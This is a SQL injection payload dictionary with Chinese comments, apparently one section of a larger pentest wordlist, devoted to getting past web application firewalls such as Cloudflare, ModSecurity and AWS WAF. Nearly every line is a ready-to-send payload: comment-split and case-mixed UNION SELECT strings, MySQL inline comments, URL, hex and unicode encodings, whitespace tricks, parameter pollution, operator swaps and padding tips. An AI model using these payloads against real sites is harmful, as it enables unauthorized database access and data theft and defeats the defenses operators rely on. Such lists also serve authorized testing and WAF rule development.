# ============================================================
# SQL Injection Payload Dictionary — 09 WAF 绕过类
# 用途: 目标有 WAF（Cloudflare / ModSecurity / AWS WAF 等）时
# 原理: 利用编码、注释、大小写等技巧绕过关键字检测
# ============================================================

# ========== 注释分隔符绕过 ==========
UN/**/ION SEL/**/ECT 1,2,3--
UN/**/ION/**/SELECT/**/1,2,3--
U/**/NION S/**/ELECT 1,2,3--
/**/UNION/**/SELECT/**/1,2,3--
UNION/**/SELECT/**/1,2,3--

# ========== 内联注释绕过（MySQL 特有）==========
/*!UNION*/ /*!SELECT*/ 1,2,3--
/*!UNION*/ /*!SELECT*/ 1,2,3--
/*!50000UNION*/ /*!50000SELECT*/ 1,2,3--

# ========== 大小写混合 ==========
UnIoN sElEcT 1,2,3--
uNiOn SeLeCt 1,2,3--
UNION SElect 1,2,3--
union select 1,2,3--
uNIoN sElECt 1,2,3--

# ========== 双写绕过 ==========
UNUNIONION SELSELECTECT 1,2,3--
UNUNIONION SELECT 1,2,3--

# ========== HTTP 参数污染 (HPP) ==========
id=1&id=2&id=3 UNION SELECT 1,2,3--
id=1 UNION SELECT 1,2,3--&id=1 UNION SELECT 1,2,3--
id[]=1 UNION SELECT 1,2,3--

# ========== 编码绕过 ==========
# URL 编码
%55%4e%49%4f%4e%20%53%45%4c%45%43%54%201,2,3--   (UNION SELECT)
%75%6e%69%6f%6e%20%73%65%6c%65%63%74%201,2,3--   (union select)

# 部分编码
u%6eion s%65lect 1,2,3--
%75nion %73elect 1,2,3--

# HEX 编码（MySQL）
0x554e494f4e2053454c454354

# 双 URL 编码
%2575%256e%2569%256f%256e

# Unicode 编码
%u0075%u006e%u0069%u006f%u006e

# ========== 空白字符替换 ==========
UNION%09SELECT%091,2,3--
UNION%0aSELECT%0a1,2,3--
UNION%0dSELECT%0d1,2,3--
UNION%0d%0aSELECT%0d%0a1,2,3--
UNION%a0SELECT%a01,2,3--
UNION%20SELECT%201,2,3--
UNION+SELECT+1,2,3--
UNION/**/SELECT/**/1,2,3--
UNION%0bSELECT%0b1,2,3--
UNION%0cSELECT%0c1,2,3--

# ========== 科学记数法绕过（数字过滤）==========
UNION SELECT 1e1,2e1,3e1--
UNION SELECT 1.0,2.0,3.0--

# ========== 函数替换 ==========
# SLEEP -> SLEEPE 然后 DB 自动忽略多余字符（少用）
SLEEP(5) -> SLEEPE(5)
BENCHMARK -> BENCHMARKK

# ========== 逻辑运算符替换 ==========
AND → &&
OR  → ||
=   → LIKE
=   → IN
=   → REGEXP
<>  → !=
>   → NOT IN

# 示例
OR 1=1 → || 1=1
AND 1=1 → && 1=1
AND 'a'='a' → AND 'a' LIKE 'a'
AND SUBSTRING(...)=1 → AND SUBSTRING(...) IN (1)
AND SUBSTRING(...)=1 → AND SUBSTRING(...) REGEXP '^1$'
AND 1=1 → AND 1<>2

# ========== 末尾加垃圾字符绕过 ==========
UNION SELECT 1,2,3--+&a=1&b=2
UNION SELECT 1,2,3-- -&token=123
UNION SELECT 1,2,3-- &c=3

# ========== 请求方法变换 ==========
# 如果 GET 被拦截，尝试 POST
# GET /?id=1 UNION SELECT 1,2,3--
# POST /  Body: id=1 UNION SELECT 1,2,3--

# Content-Type 变换
# application/x-www-form-urlencoded
# multipart/form-data
# application/json
# application/xml

# ========== 参数名混淆 ==========
?id=1 UNION SELECT 1,2,3--
&id=1 UNION SELECT 1,2,3--
Id=1 UNION SELECT 1,2,3--
ID=1 UNION SELECT 1,2,3--
iD=1 UNION SELECT 1,2,3--

# ========== 换行分割 ==========
id=1%0aUNION%0aSELECT%0a1,2,3--
1\nUNION\nSELECT\n1,2,3--

# ========== 超长 payload 绕过 ==========
# 某些 WAF 对超长请求不检查
# 在 payload 前加大量 padding
